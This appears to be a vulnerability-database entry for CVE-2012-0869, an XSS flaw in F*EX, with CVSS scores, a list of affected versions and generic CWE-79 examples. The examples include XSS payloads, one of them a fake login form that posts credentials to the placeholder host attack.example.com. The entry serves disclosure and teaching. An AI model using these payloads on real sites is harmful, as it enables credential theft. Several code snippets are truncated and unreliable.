CVE-2012-0869 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Severity

43%

Complexity

86%

Confidentiality

48%

Cross-site scripting (XSS) vulnerability in fup in Frams' Fast File EXchange (F*EX, aka fex) before 20120215 allows remote attackers to inject arbitrary web script or HTML via the id parameter.

Cross-site scripting (XSS) vulnerability in fup in Frams' Fast File EXchange (F*EX, aka fex) before 20120215 allows remote attackers to inject arbitrary web script or HTML via the id parameter.

CVSS 2.0 Base Score 4.3. CVSS Attack Vector: network. CVSS Attack Complexity: medium. CVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N).

Demo Examples

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CWE-79

This code displays a welcome message on a web page based on the HTTP GET username parameter. This example covers a Reflected XSS (Type 1) scenario.


               
echo '<div class="header"> Welcome, ' . $username . '</div>';

Because the parameter can be arbitrary, the url of the page could be modified so $username contains scripting syntax, such as


               
http://trustedSite.example.com/welcome.php?username=<Script Language="Javascript">alert("You've been attacked!");</Script>

This results in a harmless alert dialogue popping up. Initially this might not appear to be much of a vulnerability. After all, why would someone enter a URL that causes malicious code to run on their own computer? The real danger is that an attacker will create the malicious URL, then use e-mail or social engineering tricks to lure victims into visiting a link to the URL. When victims click the link, they unwittingly reflect the malicious content through the vulnerable web application back to their own computers.

More realistically, the attacker can embed a fake login box on the page, tricking the user into sending the user's password to the attacker:


               
http://trustedSite.example.com/welcome.php?username=<div id="stealPassword">Please Login:<form name="input" action="http://attack.example.com/stealPassword.php" method="post">Username: <input type="text" name="username" /><br/>Password: <input type="password" name="password" /><br/><input type="submit" value="Login" /></form></div>

If a user clicks on this link then Welcome.php will generate the following HTML and send it to the user's browser:


               
</div></div>
</form>
<input type="submit" value="Login" />

The trustworthy domain of the URL may falsely assure the user that it is OK to follow the link. However, an astute user may notice the suspicious text appended to the URL. An attacker may further obfuscate the URL (the following example links are broken into multiple lines for readability):


               
+%2F%3E%3C%2Fform%3E%3C%2Fdiv%3E%0D%0A

The same attack string could also be obfuscated as:


               
\u003E\u003C\u002F\u0066\u006F\u0072\u006D\u003E\u003C\u002F\u0064\u0069\u0076\u003E\u000D');</script>

Both of these attack links will result in the fake login box appearing on the page, and users are more likely to ignore indecipherable text at the end of URLs.

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CWE-79

This example also displays a Reflected XSS (Type 1) scenario.

The following JSP code segment reads an employee ID, eid, from an HTTP request and displays it to the user.


               
Employee ID: <%= eid %>

The following ASP.NET code segment reads an employee ID number from an HTTP request and displays it to the user.


               
<p><asp:label id="EmployeeID" runat="server" /></p>

The code in this example operates correctly if the Employee ID variable contains only standard alphanumeric text. If it has a value that includes meta-characters or source code, then the code will be executed by the web browser as it displays the HTTP response.

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CWE-79

This example covers a Stored XSS (Type 2) scenario.

The following JSP code segment queries a database for an employee with a given ID and prints the corresponding employee's name.


               
Employee Name: <%= name %>
String name = rs.getString("name");

The following ASP.NET code segment queries a database for an employee with a given employee ID and prints the name corresponding with the ID.


               
<p><asp:label id="EmployeeName" runat="server" /></p>

This code can appear less dangerous because the value of name is read from a database, whose contents are apparently managed by the application. However, if the value of name originates from user-supplied data, then the database can be a conduit for malicious content. Without proper input validation on all data stored in the database, an attacker can execute malicious commands in the user's web browser.

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CWE-79

The following example consists of two separate pages in a web application, one devoted to creating user accounts and another devoted to listing active users currently logged in. It also displays a Stored XSS (Type 2) scenario.

CreateUser.php


               
/.../

The code is careful to avoid a SQL injection attack (CWE-89) but does not stop valid HTML from being stored in the database. This can be exploited later when ListUsers.php retrieves the information:

ListUsers.php


               
echo '</div>';
exit;
//Print list of users to page
echo '<div class="userNames">'.$row['fullname'].'</div>';

The attacker can set their name to be arbitrary HTML, which will then be displayed to all visitors of the Active Users page. This HTML can, for example, be a password stealing Login message.

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CWE-79

Consider an application that provides a simplistic message board that saves messages in HTML format and appends them to a file. When a new user arrives in the room, it makes an announcement:


               
saveMessage($announceStr);//save HTML-formatted message to file; implementation details are irrelevant for this example.

An attacker may be able to perform an HTML injection (Type 2 XSS) attack by setting a cookie to a value like:


               
<script>document.alert('Hacked');</script>

The raw contents of the message file would look like:


               
<script>document.alert('Hacked');</script> has logged in.

For each person who visits the message page, their browser would execute the script, generating a pop-up window that says "Hacked". More malicious attacks are possible; see the rest of this entry.

Overview

Type

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex)

First reported 12 years ago

2012-09-25 23:55:00

Last updated 7 years ago

2017-08-29 01:31:00

Affected Software

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 2011205

2011205

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20100208

20100208

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110609

20110609

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110610

20110610

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110614

20110614

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110615

20110615

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110616

20110616

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110621

20110621

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110622

20110622

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110627

20110627

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110630

20110630

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110701

20110701

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110714

20110714

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110716

20110716

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110722

20110722

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110726

20110726

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110727

20110727

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110730

20110730

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110731

20110731

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110803

20110803

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110807

20110807

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110808

20110808

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110809

20110809

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110810

20110810

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110811

20110811

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110813

20110813

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110826

20110826

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110829

20110829

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110830

20110830

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110901

20110901

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110905

20110905

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110906

20110906

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110907

20110907

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110919

20110919

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110920

20110920

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110921

20110921

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20110930

20110930

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20111003

20111003

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20111005

20111005

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20111013

20111013

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20111028

20111028

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20111102

20111102

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20111108

20111108

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20111115

20111115

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20111129

20111129

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20111230

20111230

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20111231

20111231

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20120102

20120102

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20120106

20120106

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20120117

20120117

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20120125

20120125

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20120201

20120201

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20120202

20120202

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20120203

20120203

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20120204

20120204

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20120301

20120301

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20120305

20120305

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20120404

20120404

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20120406

20120406

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20120407

20120407

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20120426

20120426

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20120502

20120502

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20120504

20120504

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20120601

20120601

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20120605

20120605

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20120606

20120606

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20120621

20120621

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20120701

20120701

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20120702

20120702

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20120705

20120705

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20120709

20120709

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20120710

20120710

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20120711

20120711

Ulli Horlacher Frams's Fast File EXchange (F*EX, aka fex) 20120718

20120718

Stay updated

ExploitPedia is constantly evolving. Sign up to receive a notification when we release additional functionality.

Get in touch

If you'd like to report a bug or have any suggestions for improvements then please do get in touch with us using this form. We will get back to you as soon as we can.